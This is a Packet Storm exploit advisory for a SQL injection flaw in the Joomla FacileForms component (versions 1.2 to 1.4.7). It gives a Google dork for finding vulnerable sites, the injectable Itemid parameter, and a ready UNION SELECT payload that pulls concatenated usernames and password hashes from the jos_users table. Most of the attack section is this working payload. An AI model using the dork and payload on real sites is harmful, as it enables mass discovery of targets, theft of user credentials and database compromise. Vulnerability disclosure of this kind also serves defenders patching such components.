Joomla FacileForms 1.4.7 SQL Injection

2019-02-05T00:00:00
ID PACKETSTORM:151508
Type packetstorm
Reporter KingSkrupellos
Modified 2019-02-05T00:00:00

Description

                                        
                                            `####################################################################  
  
# Exploit Title : Joomla FacileForms Components 1.4.7 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 05/02/2019  
# Vendor Homepage : joomla.org  
# Software Information Link : codecanyon.net/item/facile-forms-responsive-multipurpose-css-forms/12045097  
# Software Version : From 1.2 to 1.4.7  
# Software Price : 9$  
# Other Affected Versions : CSS2, CSS3  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_facileforms''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
# Old CVE [ Only Version and Parameters is Different ] : CVE-2008-0855  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
Facile Forms: Multipurpose Easy to Use CSS Forms. Fully Customizable, Editable and Responsive.  
  
####################################################################  
  
# Impact :  
***********  
Joomla FacileForms 1.4.7 and other versions - component for Joomla and other versions is prone   
  
to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied   
  
data before using it in an SQL query.   
  
Exploiting this issue could allow an attacker to compromise the application,   
  
access or modify data, or exploit latent vulnerabilities in the underlying database.  
  
A remote attacker can send a specially crafted request to the vulnerable application   
  
and execute arbitrary SQL commands in application`s database.  
  
Further exploitation of this vulnerability may result in unauthorized data manipulation.  
  
An attacker can exploit this issue using a browser.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
/index.php?option=com_facileforms&Itemid=[SQL Injection]  
  
# Example SQL Injection Exploit Payload :  
*************************************  
1&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`